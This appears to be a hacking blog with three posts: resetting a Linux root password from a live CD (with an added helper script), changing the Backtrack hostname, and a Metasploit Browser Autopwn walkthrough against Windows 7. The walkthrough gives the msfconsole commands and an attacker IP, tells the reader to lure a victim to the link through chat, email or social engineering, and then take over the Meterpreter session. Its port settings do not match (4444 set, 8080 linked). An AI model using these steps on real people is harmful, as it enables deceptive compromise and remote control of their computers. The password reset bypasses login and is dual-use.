Cyber Survivals

Sunday, 31 March 2013

How to Reset the Root Password for Linux

At some point we can't remember the root password for our Linux machine. At that moment we are stuck, and it seems the only option left is to re-install Linux once again. Today we will learn how to reset the root password with a Linux live CD.

The only thing you need is a bootable Linux live CD.

You can use Ubuntu in "Try Ubuntu" mode, OpenSuse in "Recovery" mode or Backtrack 5 in "Forensics" mode. Any other live CD will also be fine, but it has to be the same architecture (x86 or x64) as your installed system.

Step 1: The first thing you have to do is find out the name of the partition on which your installed system is located. If you have only one hard drive it should be sda1 or sda2, but to find out for sure you can use the fdisk command.

# fdisk -l

Step 2: Once you have found the correct partition, you have to mount it and bind the dev environment into it:

# sudo mount /dev/sda1 /mnt

# sudo mount --bind /dev /mnt/dev

Step 3: After that you have to change your root directory from the live environment to the installed system.

# sudo chroot /mnt

Step 4: Now you are working inside your installed environment and can easily set a new root password. Inside the chroot you are already root, and passwd takes the user name, not the password, as its argument; it prompts for the new password twice.

# passwd root

Step 5: Finally, exit the chroot and reboot the system.

# exit
# sudo reboot

You should now be able to log in as root using the new password.
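The five steps above as one script, with two checks the manual steps skip: only id-83 Linux partitions are offered as candidates, and the chosen partition is chrooted only if it really holds /etc/shadow. This is an added example, not part of the original post; the script name, the /mnt default and the partition argument are assumptions.

```shell
#!/bin/sh
# Added example, not from the original post: the live-CD reset above as one script.
# The script name, the /mnt default and the partition argument are assumptions.
# Run from the live CD as root, e.g.:  sudo sh reset-root.sh /dev/sda1
set -eu

# Print the /dev paths of id-83 "Linux" partitions from `fdisk -l` output on stdin.
# Swap (82), LVM (8e) and extended entries are skipped; they must not be mounted here.
list_linux_partitions() {
    awk '/^\/dev\// && / 83[ \t]+Linux[ \t]*$/ { print $1 }'
}

# Succeed only if the mount point holds a root filesystem with an account database,
# so a /boot or /home partition mounted by mistake is refused instead of chroot'ed.
is_root_filesystem() {
    [ -f "$1/etc/shadow" ] && [ -f "$1/etc/passwd" ] && [ -d "$1/dev" ]
}

# Mount the partition, bind the live system's /dev and /proc into it, change the
# root password inside the chroot, then undo the mounts even if passwd fails.
reset_root_password() {
    part=$1
    mnt=${2:-/mnt}
    [ -b "$part" ] || { echo "not a block device: $part" >&2; return 1; }
    mount "$part" "$mnt"
    if ! is_root_filesystem "$mnt"; then
        echo "$part does not look like a root filesystem (no /etc/shadow)" >&2
        umount "$mnt"
        return 1
    fi
    mount --bind /dev "$mnt/dev"
    mount --bind /proc "$mnt/proc"
    status=0
    # Inside the chroot we are already root: passwd takes the user name and
    # prompts for the new password twice (never pass the password as an argument).
    chroot "$mnt" passwd root || status=$?
    umount "$mnt/proc" "$mnt/dev" "$mnt"
    return "$status"
}

if [ $# -gt 0 ]; then
    reset_root_password "$@"
else
    echo "usage: $0 /dev/sdXN [mountpoint]   (candidates: fdisk -l | list_linux_partitions)" >&2
fi
```

The whole procedure, manual or scripted, depends on the root filesystem being readable from a live CD; an encrypted root (LUKS) or a BIOS boot-order lock is what prevents it on a machine you administer.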


How to change Backtrack Hostname root@bt#

Here we see how to change the default Backtrack hostname to one of your choosing.

By default your hostname will be bt, which you can recognise from the root@bt# prompt in the terminal.

Step 1: To check your hostname, use the hostname command.


As you can see, my hostname is "bt".

Step 2: To change your hostname, run the hostname command followed by your desired name.

hostname csurvivals


To see the change you should open a new terminal.

Step 3: The above command only changes the hostname for the present session; when you restart the hostname service or restart your computer, it reverts to your earlier hostname (root@bt#).

Command to restart the service: service hostname restart

Step 4: To make the hostname permanent, we need to edit the hostname file, /etc/hostname, using any editor.

root@bt# vi /etc/hostname

Then change "bt" to your desired name and save the file:

press "i" to enter insert mode
press "Esc" to return to command mode
type ":w" to save


Step 5: Restart the hostname service or restart your computer.

Saturday, 30 March 2013

How to Hack Windows 7 in LAN using Metasploit (Metasploit Browser Autopwn)

Nowadays, due to firewall restrictions and patch management policies, exploitation of systems has become more difficult. However, one of the most efficient ways around this is the use of client-side attacks.


Browser Autopwn is one such client-side attack. Here we will examine the effectiveness of the Metasploit Browser Autopwn module.


The basic idea behind the module is that it starts a web server on our local machine which serves many different browser exploits. When the user opens the malicious link, the exploits are run against the user's browser, and if one of them succeeds a Meterpreter session is opened.


Setup Required


Attacker: Backtrack 5

Victim: Windows 7


Step 1: Open a Backtrack terminal and type msfconsole

Step 2: Now type use auxiliary/server/browser_autopwn

Step 3: Now set LHOST, PORT and URIPATH

msf auxiliary(browser_autopwn) > set lhost 192.168.5.236
msf auxiliary(browser_autopwn) > set port 4444    (you can use port 80 also)
msf auxiliary(browser_autopwn) > set uripath /
msf auxiliary(browser_autopwn) > exploit

Send the link to the server to the victim via chat, email or any other social engineering technique.


http://192.168.5.236:8080

You now have access to the victim's PC. Use "sessions -l" to list the sessions and note the session number, then type "sessions -i ID" to connect to that session.
 
Conclusion

Most organizations are behind proxy firewalls, so only port 80 is allowed, and many employees use social networks these days. An attacker can exploit that by sending a malicious link to users through social networks. So the Metasploit Browser Autopwn module is proof of how dangerous it is to open links that come from untrusted sources.